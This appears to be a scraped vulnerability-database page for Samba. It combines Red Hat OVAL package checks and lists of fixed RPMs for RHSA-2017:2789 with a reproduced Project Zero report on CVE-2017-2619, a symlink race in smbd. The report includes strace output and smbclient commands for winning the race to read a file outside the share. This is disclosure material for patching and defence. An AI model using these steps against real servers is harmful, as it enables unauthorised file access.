comment samba-swat is earlier than 0:3.6.23-45.el6_9
oval oval:com.redhat.rhsa:tst:20172789003
comment samba-swat is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhsa:tst:20100860010

AND

comment libsmbclient-devel is earlier than 0:3.6.23-45.el6_9
oval oval:com.redhat.rhsa:tst:20172789005
comment libsmbclient-devel is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhba:tst:20152258034

AND

comment samba-winbind-devel is earlier than 0:3.6.23-45.el6_9
oval oval:com.redhat.rhsa:tst:20172789007
comment samba-winbind-devel is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhsa:tst:20100860014

AND

comment samba-domainjoin-gui is earlier than 0:3.6.23-45.el6_9
oval oval:com.redhat.rhsa:tst:20172789009
comment samba-domainjoin-gui is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhsa:tst:20100860002

AND
comment samba-doc is earlier than 0:3.6.23-45.el6_9
oval oval:com.redhat.rhsa:tst:20172789011
comment samba-doc is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhsa:tst:20100860008

AND

comment samba-glusterfs is earlier than 0:3.6.23-45.el6_9
oval oval:com.redhat.rhsa:tst:20172789013
comment samba-glusterfs is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhsa:tst:20150251026

AND
comment samba-client is earlier than 0:3.6.23-45.el6_9
oval oval:com.redhat.rhsa:tst:20172789015
comment samba-client is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhba:tst:20152258014
AND
comment samba-common is earlier than 0:3.6.23-45.el6_9
oval oval:com.redhat.rhsa:tst:20172789017
comment samba-common is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhba:tst:20152258006
AND
comment samba is earlier than 0:3.6.23-45.el6_9
oval oval:com.redhat.rhsa:tst:20172789019
comment samba is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhba:tst:20152258022
AND
comment samba-winbind is earlier than 0:3.6.23-45.el6_9
oval oval:com.redhat.rhsa:tst:20172789021
comment samba-winbind is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhba:tst:20152258010

AND

comment samba-winbind-clients is earlier than 0:3.6.23-45.el6_9
oval oval:com.redhat.rhsa:tst:20172789023
comment samba-winbind-clients is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhba:tst:20152258018

AND
comment libsmbclient is earlier than 0:3.6.23-45.el6_9
oval oval:com.redhat.rhsa:tst:20172789025
comment libsmbclient is signed with Red Hat redhatrelease2 key
oval oval:com.redhat.rhba:tst:20152258012

rhsa

id	RHSA-2017:2789
released	2017-09-21
severity	Moderate
title	RHSA-2017:2789: samba security update (Moderate)

rhsa
id RHSA-2017:2338
rhsa
id RHSA-2017:2778

rpms

ctdb-0:4.4.4-13.el7_3
ctdb-tests-0:4.4.4-13.el7_3
libsmbclient-0:4.4.4-13.el7_3
libsmbclient-devel-0:4.4.4-13.el7_3
libwbclient-0:4.4.4-13.el7_3
libwbclient-devel-0:4.4.4-13.el7_3
samba-0:4.4.4-13.el7_3
samba-client-0:4.4.4-13.el7_3
samba-client-libs-0:4.4.4-13.el7_3
samba-common-0:4.4.4-13.el7_3
samba-common-libs-0:4.4.4-13.el7_3
samba-common-tools-0:4.4.4-13.el7_3
samba-dc-0:4.4.4-13.el7_3
samba-dc-libs-0:4.4.4-13.el7_3
samba-debuginfo-0:4.4.4-13.el7_3
samba-devel-0:4.4.4-13.el7_3
samba-krb5-printing-0:4.4.4-13.el7_3
samba-libs-0:4.4.4-13.el7_3
samba-pidl-0:4.4.4-13.el7_3
samba-python-0:4.4.4-13.el7_3
samba-test-0:4.4.4-13.el7_3
samba-test-libs-0:4.4.4-13.el7_3
samba-vfs-glusterfs-0:4.4.4-13.el7_3
samba-winbind-0:4.4.4-13.el7_3
samba-winbind-clients-0:4.4.4-13.el7_3
samba-winbind-krb5-locator-0:4.4.4-13.el7_3
samba-winbind-modules-0:4.4.4-13.el7_3
ctdb-0:4.6.3-4.el7rhgs
ctdb-tests-0:4.6.3-4.el7rhgs
libsmbclient-0:4.6.3-4.el7rhgs
libsmbclient-devel-0:4.6.3-4.el7rhgs
libwbclient-0:4.6.3-4.el7rhgs
libwbclient-devel-0:4.6.3-4.el7rhgs
samba-0:4.6.3-4.el7rhgs
samba-client-0:4.6.3-4.el7rhgs
samba-client-libs-0:4.6.3-4.el7rhgs
samba-common-0:4.6.3-4.el7rhgs
samba-common-libs-0:4.6.3-4.el7rhgs
samba-common-tools-0:4.6.3-4.el7rhgs
samba-dc-0:4.6.3-4.el7rhgs
samba-dc-libs-0:4.6.3-4.el7rhgs
samba-debuginfo-0:4.6.3-4.el7rhgs
samba-devel-0:4.6.3-4.el7rhgs
samba-krb5-printing-0:4.6.3-4.el7rhgs
samba-libs-0:4.6.3-4.el7rhgs
samba-pidl-0:4.6.3-4.el7rhgs
samba-python-0:4.6.3-4.el7rhgs
samba-test-0:4.6.3-4.el7rhgs
samba-test-libs-0:4.6.3-4.el7rhgs
samba-vfs-glusterfs-0:4.6.3-4.el7rhgs
samba-winbind-0:4.6.3-4.el7rhgs
samba-winbind-clients-0:4.6.3-4.el7rhgs
samba-winbind-krb5-locator-0:4.6.3-4.el7rhgs
samba-winbind-modules-0:4.6.3-4.el7rhgs
ctdb-0:4.6.3-5.el6rhs
ctdb-tests-0:4.6.3-5.el6rhs
ldb-tools-0:1.1.29-1.el6rhs
libldb-0:1.1.29-1.el6rhs
libldb-debuginfo-0:1.1.29-1.el6rhs
libldb-devel-0:1.1.29-1.el6rhs
libsmbclient-0:4.6.3-5.el6rhs
libsmbclient-devel-0:4.6.3-5.el6rhs
libtalloc-0:2.1.9-1.el6rhs
libtalloc-debuginfo-0:2.1.9-1.el6rhs
libtalloc-devel-0:2.1.9-1.el6rhs
libtdb-0:1.3.12-1.1.el6rhs
libtdb-debuginfo-0:1.3.12-1.1.el6rhs
libtdb-devel-0:1.3.12-1.1.el6rhs
libtevent-0:0.9.31-1.el6rhs
libtevent-debuginfo-0:0.9.31-1.el6rhs
libtevent-devel-0:0.9.31-1.el6rhs
libwbclient-0:4.6.3-5.el6rhs
libwbclient-devel-0:4.6.3-5.el6rhs
pyldb-0:1.1.29-1.el6rhs
pyldb-devel-0:1.1.29-1.el6rhs
pytalloc-0:2.1.9-1.el6rhs
pytalloc-devel-0:2.1.9-1.el6rhs
python-tdb-0:1.3.12-1.1.el6rhs
python-tevent-0:0.9.31-1.el6rhs
samba-0:4.6.3-5.el6rhs
samba-client-0:4.6.3-5.el6rhs
samba-client-libs-0:4.6.3-5.el6rhs
samba-common-0:4.6.3-5.el6rhs
samba-common-libs-0:4.6.3-5.el6rhs
samba-common-tools-0:4.6.3-5.el6rhs
samba-dc-0:4.6.3-5.el6rhs
samba-dc-libs-0:4.6.3-5.el6rhs
samba-debuginfo-0:4.6.3-5.el6rhs
samba-devel-0:4.6.3-5.el6rhs
samba-krb5-printing-0:4.6.3-5.el6rhs
samba-libs-0:4.6.3-5.el6rhs
samba-pidl-0:4.6.3-5.el6rhs
samba-python-0:4.6.3-5.el6rhs
samba-test-0:4.6.3-5.el6rhs
samba-test-libs-0:4.6.3-5.el6rhs
samba-vfs-glusterfs-0:4.6.3-5.el6rhs
samba-winbind-0:4.6.3-5.el6rhs
samba-winbind-clients-0:4.6.3-5.el6rhs
samba-winbind-krb5-locator-0:4.6.3-5.el6rhs
samba-winbind-modules-0:4.6.3-5.el6rhs
tdb-tools-0:1.3.12-1.1.el6rhs
libsmbclient-0:3.6.23-45.el6_9
libsmbclient-devel-0:3.6.23-45.el6_9
samba-0:3.6.23-45.el6_9
samba-client-0:3.6.23-45.el6_9
samba-common-0:3.6.23-45.el6_9
samba-debuginfo-0:3.6.23-45.el6_9
samba-doc-0:3.6.23-45.el6_9
samba-domainjoin-gui-0:3.6.23-45.el6_9
samba-glusterfs-0:3.6.23-45.el6_9
samba-swat-0:3.6.23-45.el6_9
samba-winbind-0:3.6.23-45.el6_9
samba-winbind-clients-0:3.6.23-45.el6_9
samba-winbind-devel-0:3.6.23-45.el6_9
samba-winbind-krb5-locator-0:3.6.23-45.el6_9

Seebug

bulletinFamily	exploit
description	The Samba server is supposed to only grant access to the configured share directories unless the "wide links" are enabled, in which case the server is allowed to follow symlinks. The default (since CVE-2010-0926) is that wide links are disabled. smbd ensures that it isn't following symlinks by calling lstat() on every path component, as can be seen in strace (in reaction to the request "get a/b/c/d/e/f/g/h/i/j", where /public is the root directory of the share): `root@debian:/home/user# strace-e trace=file-p18954 Process 18954 attached lstat("a/b/c/d/e/f/g/h/i/j", {st_mode=S_IFREG\|0644, st_size=4, ...}) = 0 getcwd("/public", 4096) = 8 lstat("/public/a", {st_mode=S_IFDIR\|0755, st_size=4096, ...}) = 0 lstat("/public/a/b", {st_mode=S_IFDIR\|0755, st_size=4096, ...}) = 0 lstat("/public/a/b/c", {st_mode=S_IFDIR\|0755, st_size=4096, ...}) = 0 lstat("/public/a/b/c/d", {st_mode=S_IFDIR\|0755, st_size=4096, ...}) = 0 lstat("/public/a/b/c/d/e", {st_mode=S_IFDIR\|0755, st_size=4096, ...}) = 0 lstat("/public/a/b/c/d/e/f", {st_mode=S_IFDIR\|0755, st_size=4096, ...}) = 0 lstat("/public/a/b/c/d/e/f/g", {st_mode=S_IFDIR\|0755, st_size=4096, ...}) = 0 lstat("/public/a/b/c/d/e/f/g/h", {st_mode=S_IFDIR\|0755, st_size=4096, ...}) = 0 lstat("/public/a/b/c/d/e/f/g/h/i", {st_mode=S_IFDIR\|0755, st_size=4096, ...}) = 0 lstat("/public/a/b/c/d/e/f/g/h/i/j", {st_mode=S_IFREG\|0644, st_size=4, ...}) = 0 stat("a/b/c/d/e/f/g/h/i/j", {st_mode=S_IFREG\|0644, st_size=4, ...}) = 0 getxattr("a/b/c/d/e/f/g/h/i/j", "system. posix_acl_access", 0x7ffc8d870c30, 132) = -1 ENODATA (No data available) stat("a/b/c/d/e/f/g/h/i/j", {st_mode=S_IFREG\|0644, st_size=4, ...}) = 0 open("a/b/c/d/e/f/g/h/i/j", O_RDONLY) = 35` This is racy: Any of the path components - either one of the directories or the file at the end - could be replaced with a symlink by an attacker over a second connection to the same share. For example, replacing a/b/c/d/e/f/g/h/i with a symlink to / immediately before the open() call would cause smbd to open /j. To reproduce: * Set up a server with Samba 4.5.2. (I'm using Samba 4.5.2 from Debian unstable. I'm running the attacks on a native machine while the server is running in a VM on the same machine.) * On the server, create a world-readable file "/secret" that contains some text. The goal of the attacker is to leak the contents of that file. * On the server, create a directory "/public", mode 0777. * Create a share named "public", accessible for guests, writable, with the path "/public". * As the attacker, patch a copy of the samba-4.5.2 sourcecode with the patch in attack_commands. patch. * Build the patched copy of the samba-4.5.2. The built-in smbclient will be used in the following steps. * Prepare the server's directory layout remotely and start the rename side of the race: `` $ ./ bin/default/source3/client/smbclient-N-U guest //192.168.56.101/public ./ bin/default/source3/client/smbclient: Can't load /usr/local/samba/etc/smb. conf - run testparm to debug it Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.5.2-Debian] smb: > posix Server supports CIFS extensions 1.0 Server supports CIFS capabilities locks acls pathnames posix_path_operations large_read posix_encrypt the smb: /> ls . D 0 Wed Dec 14 23:54:30 2016 .. D 0 Wed Dec 14 13:02:50 2016 98853468 blocks of size 1024. 66181136 blocks available the smb: /> symlink / link the smb: /> mkdir normal the smb: /> put /tmp/empty normal/secret # empty file putting file /tmp/empty as /normal/secret (0.0 kb/s) (average 0.0 kb/s) the smb: /> rename_loop use normal foobar `` * Over a second connection, launch the read side of the race: `$ ./ bin/default/source3/client/smbclient-N-U guest //192.168.56.101/public ./ bin/default/source3/client/smbclient: Can't load /usr/local/samba/etc/smb. conf - run testparm to debug it Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.5.2-Debian] smb: \> posix Server supports CIFS extensions 1.0 Server supports CIFS capabilities locks acls pathnames posix_path_operations large_read posix_encrypt the smb: /> dump foobar/secret` * At this point, the race can theoretically be hit. However, because the renaming client performs operations synchronously, the network latency makes it hard to win the race. (It shouldn't be too hard to adapt the SMB client to be asynchronous, which would make the attack much more practical.) To make it easier to hit the race, log in to the server as root and run "strace" against the process that is trying to access foobar/secret all the time without any filtering ("strace-p19624"). On my machine, this causes the race to be hit every few seconds, and the smbclient that is running the "dump" command prints the contents of the file each time the race is won. Attachment: [ attack_commands. patch ](<https://bugs.chromium.org/p/project-zero/issues/attachment?aid=263723>)
id	SSV:92840
last seen	2017-11-19
modified	2017-03-28
published	2017-03-28
reporter	Root
title	Samba: symlink race permits opening files outside share directory (CVE-2017-2619)

Summary

Vulnerable Configurations

Common Weakness Enumeration (CWE)

Common Attack Pattern Enumeration and Classification (CAPEC)

Exploit-Db

Nessus

Redhat

Seebug

References